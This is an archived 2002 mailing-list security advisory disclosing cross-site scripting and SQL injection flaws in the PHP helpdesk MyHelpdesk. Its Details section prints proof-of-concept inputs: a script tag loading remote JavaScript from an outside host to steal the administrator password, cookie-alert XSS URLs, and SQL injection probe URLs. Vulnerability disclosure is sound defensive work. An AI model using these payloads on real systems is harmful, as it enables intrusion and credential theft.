OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Ahmet Sabri ALPER (s_alperhotmail.com)
Date: Mon Jun 10 2002 - 06:50:47 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ('binary' encoding is not supported, stored as-is) +/--------\-------- ALPER Research Labs ------/--------/+
    +/---------\------- Security Advisory -----/---------/+
    +/----------\------ ID: ARL02-A15 ----/----------/+
    +/-----------\----- salperolympos.org ---/-----------/+


    Advisory Information
    --------------------
    Name : Multiple Security Issues in MyHelpdesk
    Software Package : MyHelpdesk
    Vendor Homepage : http://myhelpdesk.sourceforge.net/
    Vulnerable Versions: v20020509 and older
    Platforms : OS Independent, PHP
    Vulnerability Type : Input Validation Error
    Vendor Contacted : 01/06/2002
    Vendor Replied : 02/06/2002
    Prior Problems : N/A
    Current Version : v20020509 (vulnerable)


    Summary
    -------
    MyHelpdesk is a PHP/MySQL Helpdesk system based on the
    OneOrZero Helpdesk but with a different set of features.
    The system is appropriate for the Support Desk of small
    organizations.

    Multiple Cross Site Scripting and SQL injection problems
    exist within "MyHelpdesk".


    Details
    -------
    1. When a support assistant creates a new ticket, the Title
    and Description input is not filtered for malicious code,
    therefore they allow Cross Site Scripting attacks, which may
    provide any supporter, the administrator password if the issue
    is exploited correctly.
    Proof-of-concept input for Title and/or Description fields:
    <script src="http://forum.olympos.org/f.js">Alper</script>


    2. Maliciously crafted links from third party sites may allow
    Cross Site Scripting attacks. This can be accomplished via three
    different functions of index.php:
    http://[TARGET]/supporter/index.php?t=tickettime&id=<script>alert
    (document.cookie)</script>
    http://[TARGET]/supporter/index.php?t=ticketfiles&id=<script>alert
    (document.cookie)</script>
    http://[TARGET]/supporter/index.php?t=updateticketlog&id=<script>alert
    (document.cookie)</script>

    3. Also when any ticket is edited, the update section
    also is not filtered correctly and may carry malicious code.

    4. Three different functions of the "index.php" allows passage
    of user input directly to the SQL query. This makes it possible
    for attackers to launch SQL injection attacks.

    http://[TARGET]/supporter/index.php?t=detailticket&id=root%20me
    http://[TARGET]/supporter/index.php?t=editticket&id=got%20root
    http://[TARGET]/supporter/index.php?t=updateticketlog&id=without%20me


    Solution
    --------
    The vendor stated in his reply that MyHelpDesk was
    designed for internal use for small organizations, and
    such issues would not do much harm for internal
    systems.

    Workaround;
    Filter the $id, $title, $description variables for
    malicious code.


    Credits
    -------
    Discovered on 01, June, 2002 by
    Ahmet Sabri ALPER <salperolympos.org>
    ALPER Research Labs.

    The ALPER Research Labs. [ARL] workers are freelancer
    security professionals and WhiteHat hackers. The ARL
    workers are available for hiring for legal jobs.
    The ARL also supports Open Software Community, by detecting
    possible security issues in GPL or any other Public Licensed
    product.


    References
    ----------
    Product Web Page: http://myhelpdesk.sourceforge.net/
    Olympos: http://www.olympos.org/